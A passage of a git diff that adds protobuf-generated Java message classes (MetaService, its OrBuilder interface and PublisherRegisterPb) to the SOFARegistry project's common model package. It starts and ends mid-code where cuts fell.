(com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + id_ = s; + return s; + } + } + /** string id = 1; */ + public com.google.protobuf.ByteString getIdBytes() { + java.lang.Object ref = id_; + if (ref instanceof java.lang.String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + id_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + + public static final int PARAMS_FIELD_NUMBER = 3; + + private static final class ParamsDefaultEntryHolder { + static final com.google.protobuf.MapEntry< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.StringList> + defaultEntry = + com.google.protobuf.MapEntry + . + newDefaultInstance( + com.alipay.sofa.registry.common.model.client.pb.AppDiscoveryMetaPb + .internal_static_MetaService_ParamsEntry_descriptor, + com.google.protobuf.WireFormat.FieldType.STRING, + "", + com.google.protobuf.WireFormat.FieldType.MESSAGE, + com.alipay.sofa.registry.common.model.client.pb.StringList + .getDefaultInstance()); + } + + private com.google.protobuf.MapField< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.StringList> + params_; + + private com.google.protobuf.MapField< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.StringList> + internalGetParams() { + if (params_ == null) { + return com.google.protobuf.MapField.emptyMapField(ParamsDefaultEntryHolder.defaultEntry); + } + return params_; + } + + public int getParamsCount() { + return internalGetParams().getMap().size(); + } + /** map<string, .StringList> params = 3; */ + public boolean containsParams(java.lang.String key) { + if (key == null) { + throw new java.lang.NullPointerException(); + } + return internalGetParams().getMap().containsKey(key); + } + /** Use {@link #getParamsMap()} instead. */ + @java.lang.Deprecated + public java.util.Map + getParams() { + return getParamsMap(); + } + /** map<string, .StringList> params = 3; */ + public java.util.Map + getParamsMap() { + return internalGetParams().getMap(); + } + /** map<string, .StringList> params = 3; */ + public com.alipay.sofa.registry.common.model.client.pb.StringList getParamsOrDefault( + java.lang.String key, + com.alipay.sofa.registry.common.model.client.pb.StringList defaultValue) { + if (key == null) { + throw new java.lang.NullPointerException(); + } + java.util.Map + map = internalGetParams().getMap(); + return map.containsKey(key) ? map.get(key) : defaultValue; + } + /** map<string, .StringList> params = 3; */ + public com.alipay.sofa.registry.common.model.client.pb.StringList getParamsOrThrow( + java.lang.String key) { + if (key == null) { + throw new java.lang.NullPointerException(); + } + java.util.Map + map = internalGetParams().getMap(); + if (!map.containsKey(key)) { + throw new java.lang.IllegalArgumentException(); + } + return map.get(key); + } + + private byte memoizedIsInitialized = -1; + + public final boolean isInitialized() { + byte isInitialized = memoizedIsInitialized; + if (isInitialized == 1) return true; + if (isInitialized == 0) return false; + + memoizedIsInitialized = 1; + return true; + } + + public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { + if (!getIdBytes().isEmpty()) { + com.google.protobuf.GeneratedMessageV3.writeString(output, 1, id_); + } + com.google.protobuf.GeneratedMessageV3.serializeStringMapTo( + output, internalGetParams(), ParamsDefaultEntryHolder.defaultEntry, 3); + unknownFields.writeTo(output); + } + + public int getSerializedSize() { + int size = memoizedSize; + if (size != -1) return size; + + size = 0; + if (!getIdBytes().isEmpty()) { + size += com.google.protobuf.GeneratedMessageV3.computeStringSize(1, id_); + } + for (java.util.Map.Entry< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.StringList> + entry : internalGetParams().getMap().entrySet()) { + com.google.protobuf.MapEntry< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.StringList> + params__ = + ParamsDefaultEntryHolder.defaultEntry + .newBuilderForType() + .setKey(entry.getKey()) + .setValue(entry.getValue()) + .build(); + size += com.google.protobuf.CodedOutputStream.computeMessageSize(3, params__); + } + size += unknownFields.getSerializedSize(); + memoizedSize = size; + return size; + } + + @java.lang.Override + public boolean equals(final java.lang.Object obj) { + if (obj == this) { + return true; + } + if (!(obj instanceof com.alipay.sofa.registry.common.model.client.pb.MetaService)) { + return super.equals(obj); + } + com.alipay.sofa.registry.common.model.client.pb.MetaService other = + (com.alipay.sofa.registry.common.model.client.pb.MetaService) obj; + + boolean result = true; + result = result && getId().equals(other.getId()); + result = result && internalGetParams().equals(other.internalGetParams()); + result = result && unknownFields.equals(other.unknownFields); + return result; + } + + @java.lang.Override + public int hashCode() { + if (memoizedHashCode != 0) { + return memoizedHashCode; + } + int hash = 41; + hash = (19 * hash) + getDescriptor().hashCode(); + hash = (37 * hash) + ID_FIELD_NUMBER; + hash = (53 * hash) + getId().hashCode(); + if (!internalGetParams().getMap().isEmpty()) { + hash = (37 * hash) + PARAMS_FIELD_NUMBER; + hash = (53 * hash) + internalGetParams().hashCode(); + } + hash = (29 * hash) + unknownFields.hashCode(); + memoizedHashCode = hash; + return hash; + } + + public static com.alipay.sofa.registry.common.model.client.pb.MetaService parseFrom( + java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data); + } + + public static com.alipay.sofa.registry.common.model.client.pb.MetaService parseFrom( + java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.MetaService parseFrom( + com.google.protobuf.ByteString data) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data); + } + + public static com.alipay.sofa.registry.common.model.client.pb.MetaService parseFrom( + com.google.protobuf.ByteString data, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.MetaService parseFrom(byte[] data) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data); + } + + public static com.alipay.sofa.registry.common.model.client.pb.MetaService parseFrom( + byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.MetaService parseFrom( + java.io.InputStream input) throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); + } + + public static com.alipay.sofa.registry.common.model.client.pb.MetaService parseFrom( + java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException( + PARSER, input, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.MetaService parseDelimitedFrom( + java.io.InputStream input) throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); + } + + public static com.alipay.sofa.registry.common.model.client.pb.MetaService parseDelimitedFrom( + java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( + PARSER, input, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.MetaService parseFrom( + com.google.protobuf.CodedInputStream input) throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); + } + + public static com.alipay.sofa.registry.common.model.client.pb.MetaService parseFrom( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException( + PARSER, input, extensionRegistry); + } + + public Builder newBuilderForType() { + return newBuilder(); + } + + public static Builder newBuilder() { + return DEFAULT_INSTANCE.toBuilder(); + } + + public static Builder newBuilder( + com.alipay.sofa.registry.common.model.client.pb.MetaService prototype) { + return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); + } + + public Builder toBuilder() { + return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); + } + + @java.lang.Override + protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { + Builder builder = new Builder(parent); + return builder; + } + /** Protobuf type {@code MetaService} */ + public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder + implements + // @@protoc_insertion_point(builder_implements:MetaService) + com.alipay.sofa.registry.common.model.client.pb.MetaServiceOrBuilder { + public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { + return com.alipay.sofa.registry.common.model.client.pb.AppDiscoveryMetaPb + .internal_static_MetaService_descriptor; + } + + @SuppressWarnings({"rawtypes"}) + protected com.google.protobuf.MapField internalGetMapField(int number) { + switch (number) { + case 3: + return internalGetParams(); + default: + throw new RuntimeException("Invalid map field number: " + number); + } + } + + @SuppressWarnings({"rawtypes"}) + protected com.google.protobuf.MapField internalGetMutableMapField(int number) { + switch (number) { + case 3: + return internalGetMutableParams(); + default: + throw new RuntimeException("Invalid map field number: " + number); + } + } + + protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internalGetFieldAccessorTable() { + return com.alipay.sofa.registry.common.model.client.pb.AppDiscoveryMetaPb + .internal_static_MetaService_fieldAccessorTable + .ensureFieldAccessorsInitialized( + com.alipay.sofa.registry.common.model.client.pb.MetaService.class, + com.alipay.sofa.registry.common.model.client.pb.MetaService.Builder.class); + } + + // Construct using com.alipay.sofa.registry.common.model.client.pb.MetaService.newBuilder() + private Builder() { + maybeForceBuilderInitialization(); + } + + private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { + super(parent); + maybeForceBuilderInitialization(); + } + + private void maybeForceBuilderInitialization() { + if (com.google.protobuf.GeneratedMessageV3.alwaysUseFieldBuilders) {} + } + + public Builder clear() { + super.clear(); + id_ = ""; + + internalGetMutableParams().clear(); + return this; + } + + public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { + return com.alipay.sofa.registry.common.model.client.pb.AppDiscoveryMetaPb + .internal_static_MetaService_descriptor; + } + + public com.alipay.sofa.registry.common.model.client.pb.MetaService getDefaultInstanceForType() { + return com.alipay.sofa.registry.common.model.client.pb.MetaService.getDefaultInstance(); + } + + public com.alipay.sofa.registry.common.model.client.pb.MetaService build() { + com.alipay.sofa.registry.common.model.client.pb.MetaService result = buildPartial(); + if (!result.isInitialized()) { + throw newUninitializedMessageException(result); + } + return result; + } + + public com.alipay.sofa.registry.common.model.client.pb.MetaService buildPartial() { + com.alipay.sofa.registry.common.model.client.pb.MetaService result = + new com.alipay.sofa.registry.common.model.client.pb.MetaService(this); + int from_bitField0_ = bitField0_; + int to_bitField0_ = 0; + result.id_ = id_; + result.params_ = internalGetParams(); + result.params_.makeImmutable(); + result.bitField0_ = to_bitField0_; + onBuilt(); + return result; + } + + public Builder clone() { + return (Builder) super.clone(); + } + + public Builder setField( + com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { + return (Builder) super.setField(field, value); + } + + public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { + return (Builder) super.clearField(field); + } + + public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { + return (Builder) super.clearOneof(oneof); + } + + public Builder setRepeatedField( + com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { + return (Builder) super.setRepeatedField(field, index, value); + } + + public Builder addRepeatedField( + com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { + return (Builder) super.addRepeatedField(field, value); + } + + public Builder mergeFrom(com.google.protobuf.Message other) { + if (other instanceof com.alipay.sofa.registry.common.model.client.pb.MetaService) { + return mergeFrom((com.alipay.sofa.registry.common.model.client.pb.MetaService) other); + } else { + super.mergeFrom(other); + return this; + } + } + + public Builder mergeFrom(com.alipay.sofa.registry.common.model.client.pb.MetaService other) { + if (other == com.alipay.sofa.registry.common.model.client.pb.MetaService.getDefaultInstance()) + return this; + if (!other.getId().isEmpty()) { + id_ = other.id_; + onChanged(); + } + internalGetMutableParams().mergeFrom(other.internalGetParams()); + this.mergeUnknownFields(other.unknownFields); + onChanged(); + return this; + } + + public final boolean isInitialized() { + return true; + } + + public Builder mergeFrom( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + com.alipay.sofa.registry.common.model.client.pb.MetaService parsedMessage = null; + try { + parsedMessage = PARSER.parsePartialFrom(input, extensionRegistry); + } catch (com.google.protobuf.InvalidProtocolBufferException e) { + parsedMessage = + (com.alipay.sofa.registry.common.model.client.pb.MetaService) e.getUnfinishedMessage(); + throw e.unwrapIOException(); + } finally { + if (parsedMessage != null) { + mergeFrom(parsedMessage); + } + } + return this; + } + + private int bitField0_; + + private java.lang.Object id_ = ""; + /** string id = 1; */ + public java.lang.String getId() { + java.lang.Object ref = id_; + if (!(ref instanceof java.lang.String)) { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + id_ = s; + return s; + } else { + return (java.lang.String) ref; + } + } + /** string id = 1; */ + public com.google.protobuf.ByteString getIdBytes() { + java.lang.Object ref = id_; + if (ref instanceof String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + id_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + /** string id = 1; */ + public Builder setId(java.lang.String value) { + if (value == null) { + throw new NullPointerException(); + } + + id_ = value; + onChanged(); + return this; + } + /** string id = 1; */ + public Builder clearId() { + + id_ = getDefaultInstance().getId(); + onChanged(); + return this; + } + /** string id = 1; */ + public Builder setIdBytes(com.google.protobuf.ByteString value) { + if (value == null) { + throw new NullPointerException(); + } + checkByteStringIsUtf8(value); + + id_ = value; + onChanged(); + return this; + } + + private com.google.protobuf.MapField< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.StringList> + params_; + + private com.google.protobuf.MapField< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.StringList> + internalGetParams() { + if (params_ == null) { + return com.google.protobuf.MapField.emptyMapField(ParamsDefaultEntryHolder.defaultEntry); + } + return params_; + } + + private com.google.protobuf.MapField< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.StringList> + internalGetMutableParams() { + onChanged(); + ; + if (params_ == null) { + params_ = com.google.protobuf.MapField.newMapField(ParamsDefaultEntryHolder.defaultEntry); + } + if (!params_.isMutable()) { + params_ = params_.copy(); + } + return params_; + } + + public int getParamsCount() { + return internalGetParams().getMap().size(); + } + /** map<string, .StringList> params = 3; */ + public boolean containsParams(java.lang.String key) { + if (key == null) { + throw new java.lang.NullPointerException(); + } + return internalGetParams().getMap().containsKey(key); + } + /** Use {@link #getParamsMap()} instead. */ + @java.lang.Deprecated + public java.util.Map< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.StringList> + getParams() { + return getParamsMap(); + } + /** map<string, .StringList> params = 3; */ + public java.util.Map< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.StringList> + getParamsMap() { + return internalGetParams().getMap(); + } + /** map<string, .StringList> params = 3; */ + public com.alipay.sofa.registry.common.model.client.pb.StringList getParamsOrDefault( + java.lang.String key, + com.alipay.sofa.registry.common.model.client.pb.StringList defaultValue) { + if (key == null) { + throw new java.lang.NullPointerException(); + } + java.util.Map + map = internalGetParams().getMap(); + return map.containsKey(key) ? map.get(key) : defaultValue; + } + /** map<string, .StringList> params = 3; */ + public com.alipay.sofa.registry.common.model.client.pb.StringList getParamsOrThrow( + java.lang.String key) { + if (key == null) { + throw new java.lang.NullPointerException(); + } + java.util.Map + map = internalGetParams().getMap(); + if (!map.containsKey(key)) { + throw new java.lang.IllegalArgumentException(); + } + return map.get(key); + } + + public Builder clearParams() { + internalGetMutableParams().getMutableMap().clear(); + return this; + } + /** map<string, .StringList> params = 3; */ + public Builder removeParams(java.lang.String key) { + if (key == null) { + throw new java.lang.NullPointerException(); + } + internalGetMutableParams().getMutableMap().remove(key); + return this; + } + /** Use alternate mutation accessors instead. */ + @java.lang.Deprecated + public java.util.Map< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.StringList> + getMutableParams() { + return internalGetMutableParams().getMutableMap(); + } + /** map<string, .StringList> params = 3; */ + public Builder putParams( + java.lang.String key, com.alipay.sofa.registry.common.model.client.pb.StringList value) { + if (key == null) { + throw new java.lang.NullPointerException(); + } + if (value == null) { + throw new java.lang.NullPointerException(); + } + internalGetMutableParams().getMutableMap().put(key, value); + return this; + } + /** map<string, .StringList> params = 3; */ + public Builder putAllParams( + java.util.Map + values) { + internalGetMutableParams().getMutableMap().putAll(values); + return this; + } + + public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { + return super.setUnknownFieldsProto3(unknownFields); + } + + public final Builder mergeUnknownFields( + final com.google.protobuf.UnknownFieldSet unknownFields) { + return super.mergeUnknownFields(unknownFields); + } + + // @@protoc_insertion_point(builder_scope:MetaService) + } + + // @@protoc_insertion_point(class_scope:MetaService) + private static final com.alipay.sofa.registry.common.model.client.pb.MetaService DEFAULT_INSTANCE; + + static { + DEFAULT_INSTANCE = new com.alipay.sofa.registry.common.model.client.pb.MetaService(); + } + + public static com.alipay.sofa.registry.common.model.client.pb.MetaService getDefaultInstance() { + return DEFAULT_INSTANCE; + } + + private static final com.google.protobuf.Parser PARSER = + new com.google.protobuf.AbstractParser() { + public MetaService parsePartialFrom( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return new MetaService(input, extensionRegistry); + } + }; + + public static com.google.protobuf.Parser parser() { + return PARSER; + } + + @java.lang.Override + public com.google.protobuf.Parser getParserForType() { + return PARSER; + } + + public com.alipay.sofa.registry.common.model.client.pb.MetaService getDefaultInstanceForType() { + return DEFAULT_INSTANCE; + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/MetaServiceOrBuilder.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/MetaServiceOrBuilder.java new file mode 100644 index 000000000..24e1240ee --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/MetaServiceOrBuilder.java @@ -0,0 +1,46 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.client.pb; + +public interface MetaServiceOrBuilder + extends + // @@protoc_insertion_point(interface_extends:MetaService) + com.google.protobuf.MessageOrBuilder { + + /** string id = 1; */ + java.lang.String getId(); + /** string id = 1; */ + com.google.protobuf.ByteString getIdBytes(); + + /** map<string, .StringList> params = 3; */ + int getParamsCount(); + /** map<string, .StringList> params = 3; */ + boolean containsParams(java.lang.String key); + /** Use {@link #getParamsMap()} instead. */ + @java.lang.Deprecated + java.util.Map + getParams(); + /** map<string, .StringList> params = 3; */ + java.util.Map + getParamsMap(); + /** map<string, .StringList> params = 3; */ + com.alipay.sofa.registry.common.model.client.pb.StringList getParamsOrDefault( + java.lang.String key, + com.alipay.sofa.registry.common.model.client.pb.StringList defaultValue); + /** map<string, .StringList> params = 3; */ + com.alipay.sofa.registry.common.model.client.pb.StringList getParamsOrThrow(java.lang.String key); +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/PublisherRegisterPb.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/PublisherRegisterPb.java new file mode 100644 index 000000000..0d6c870ae --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/PublisherRegisterPb.java @@ -0,0 +1,931 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.client.pb; + +/** Protobuf type {@code PublisherRegisterPb} */ +public final class PublisherRegisterPb extends com.google.protobuf.GeneratedMessageV3 + implements + // @@protoc_insertion_point(message_implements:PublisherRegisterPb) + PublisherRegisterPbOrBuilder { + private static final long serialVersionUID = 0L; + // Use PublisherRegisterPb.newBuilder() to construct. + private PublisherRegisterPb(com.google.protobuf.GeneratedMessageV3.Builder builder) { + super(builder); + } + + private PublisherRegisterPb() { + dataList_ = java.util.Collections.emptyList(); + } + + @java.lang.Override + public final com.google.protobuf.UnknownFieldSet getUnknownFields() { + return this.unknownFields; + } + + private PublisherRegisterPb( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + this(); + if (extensionRegistry == null) { + throw new java.lang.NullPointerException(); + } + int mutable_bitField0_ = 0; + com.google.protobuf.UnknownFieldSet.Builder unknownFields = + com.google.protobuf.UnknownFieldSet.newBuilder(); + try { + boolean done = false; + while (!done) { + int tag = input.readTag(); + switch (tag) { + case 0: + done = true; + break; + default: + { + if (!parseUnknownFieldProto3(input, unknownFields, extensionRegistry, tag)) { + done = true; + } + break; + } + case 10: + { + if (!((mutable_bitField0_ & 0x00000001) == 0x00000001)) { + dataList_ = + new java.util.ArrayList< + com.alipay.sofa.registry.common.model.client.pb.DataBoxPb>(); + mutable_bitField0_ |= 0x00000001; + } + dataList_.add( + input.readMessage( + com.alipay.sofa.registry.common.model.client.pb.DataBoxPb.parser(), + extensionRegistry)); + break; + } + case 18: + { + com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb.Builder subBuilder = + null; + if (baseRegister_ != null) { + subBuilder = baseRegister_.toBuilder(); + } + baseRegister_ = + input.readMessage( + com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb.parser(), + extensionRegistry); + if (subBuilder != null) { + subBuilder.mergeFrom(baseRegister_); + baseRegister_ = subBuilder.buildPartial(); + } + + break; + } + } + } + } catch (com.google.protobuf.InvalidProtocolBufferException e) { + throw e.setUnfinishedMessage(this); + } catch (java.io.IOException e) { + throw new com.google.protobuf.InvalidProtocolBufferException(e).setUnfinishedMessage(this); + } finally { + if (((mutable_bitField0_ & 0x00000001) == 0x00000001)) { + dataList_ = java.util.Collections.unmodifiableList(dataList_); + } + this.unknownFields = unknownFields.build(); + makeExtensionsImmutable(); + } + } + + public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { + return com.alipay.sofa.registry.common.model.client.pb.PublisherRegisterPbOuterClass + .internal_static_PublisherRegisterPb_descriptor; + } + + protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internalGetFieldAccessorTable() { + return com.alipay.sofa.registry.common.model.client.pb.PublisherRegisterPbOuterClass + .internal_static_PublisherRegisterPb_fieldAccessorTable + .ensureFieldAccessorsInitialized( + com.alipay.sofa.registry.common.model.client.pb.PublisherRegisterPb.class, + com.alipay.sofa.registry.common.model.client.pb.PublisherRegisterPb.Builder.class); + } + + private int bitField0_; + public static final int DATALIST_FIELD_NUMBER = 1; + private java.util.List dataList_; + /** repeated .DataBoxPb dataList = 1; */ + public java.util.List + getDataListList() { + return dataList_; + } + /** repeated .DataBoxPb dataList = 1; */ + public java.util.List< + ? extends com.alipay.sofa.registry.common.model.client.pb.DataBoxPbOrBuilder> + getDataListOrBuilderList() { + return dataList_; + } + /** repeated .DataBoxPb dataList = 1; */ + public int getDataListCount() { + return dataList_.size(); + } + /** repeated .DataBoxPb dataList = 1; */ + public com.alipay.sofa.registry.common.model.client.pb.DataBoxPb getDataList(int index) { + return dataList_.get(index); + } + /** repeated .DataBoxPb dataList = 1; */ + public com.alipay.sofa.registry.common.model.client.pb.DataBoxPbOrBuilder getDataListOrBuilder( + int index) { + return dataList_.get(index); + } + + public static final int BASEREGISTER_FIELD_NUMBER = 2; + private com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb baseRegister_; + /** .BaseRegisterPb baseRegister = 2; */ + public boolean hasBaseRegister() { + return baseRegister_ != null; + } + /** .BaseRegisterPb baseRegister = 2; */ + public com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb getBaseRegister() { + return baseRegister_ == null + ? com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb.getDefaultInstance() + : baseRegister_; + } + /** .BaseRegisterPb baseRegister = 2; */ + public com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPbOrBuilder + getBaseRegisterOrBuilder() { + return getBaseRegister(); + } + + private byte memoizedIsInitialized = -1; + + public final boolean isInitialized() { + byte isInitialized = memoizedIsInitialized; + if (isInitialized == 1) return true; + if (isInitialized == 0) return false; + + memoizedIsInitialized = 1; + return true; + } + + public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { + for (int i = 0; i < dataList_.size(); i++) { + output.writeMessage(1, dataList_.get(i)); + } + if (baseRegister_ != null) { + output.writeMessage(2, getBaseRegister()); + } + unknownFields.writeTo(output); + } + + public int getSerializedSize() { + int size = memoizedSize; + if (size != -1) return size; + + size = 0; + for (int i = 0; i < dataList_.size(); i++) { + size += com.google.protobuf.CodedOutputStream.computeMessageSize(1, dataList_.get(i)); + } + if (baseRegister_ != null) { + size += com.google.protobuf.CodedOutputStream.computeMessageSize(2, getBaseRegister()); + } + size += unknownFields.getSerializedSize(); + memoizedSize = size; + return size; + } + + @java.lang.Override + public boolean equals(final java.lang.Object obj) { + if (obj == this) { + return true; + } + if (!(obj instanceof com.alipay.sofa.registry.common.model.client.pb.PublisherRegisterPb)) { + return super.equals(obj); + } + com.alipay.sofa.registry.common.model.client.pb.PublisherRegisterPb other = + (com.alipay.sofa.registry.common.model.client.pb.PublisherRegisterPb) obj; + + boolean result = true; + result = result && getDataListList().equals(other.getDataListList()); + result = result && (hasBaseRegister() == other.hasBaseRegister()); + if (hasBaseRegister()) { + result = result && getBaseRegister().equals(other.getBaseRegister()); + } + result = result && unknownFields.equals(other.unknownFields); + return result; + } + + @java.lang.Override + public int hashCode() { + if (memoizedHashCode != 0) { + return memoizedHashCode; + } + int hash = 41; + hash = (19 * hash) + getDescriptor().hashCode(); + if (getDataListCount() > 0) { + hash = (37 * hash) + DATALIST_FIELD_NUMBER; + hash = (53 * hash) + getDataListList().hashCode(); + } + if (hasBaseRegister()) { + hash = (37 * hash) + BASEREGISTER_FIELD_NUMBER; + hash = (53 * hash) + getBaseRegister().hashCode(); + } + hash = (29 * hash) + unknownFields.hashCode(); + memoizedHashCode = hash; + return hash; + } + + public static com.alipay.sofa.registry.common.model.client.pb.PublisherRegisterPb parseFrom( + java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data); + } + + public static com.alipay.sofa.registry.common.model.client.pb.PublisherRegisterPb parseFrom( + java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.PublisherRegisterPb parseFrom( + com.google.protobuf.ByteString data) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data); + } + + public static com.alipay.sofa.registry.common.model.client.pb.PublisherRegisterPb parseFrom( + com.google.protobuf.ByteString data, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.PublisherRegisterPb parseFrom( + byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data); + } + + public static com.alipay.sofa.registry.common.model.client.pb.PublisherRegisterPb parseFrom( + byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.PublisherRegisterPb parseFrom( + java.io.InputStream input) throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); + } + + public static com.alipay.sofa.registry.common.model.client.pb.PublisherRegisterPb parseFrom( + java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException( + PARSER, input, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.PublisherRegisterPb + parseDelimitedFrom(java.io.InputStream input) throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); + } + + public static com.alipay.sofa.registry.common.model.client.pb.PublisherRegisterPb + parseDelimitedFrom( + java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( + PARSER, input, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.PublisherRegisterPb parseFrom( + com.google.protobuf.CodedInputStream input) throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); + } + + public static com.alipay.sofa.registry.common.model.client.pb.PublisherRegisterPb parseFrom( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + return 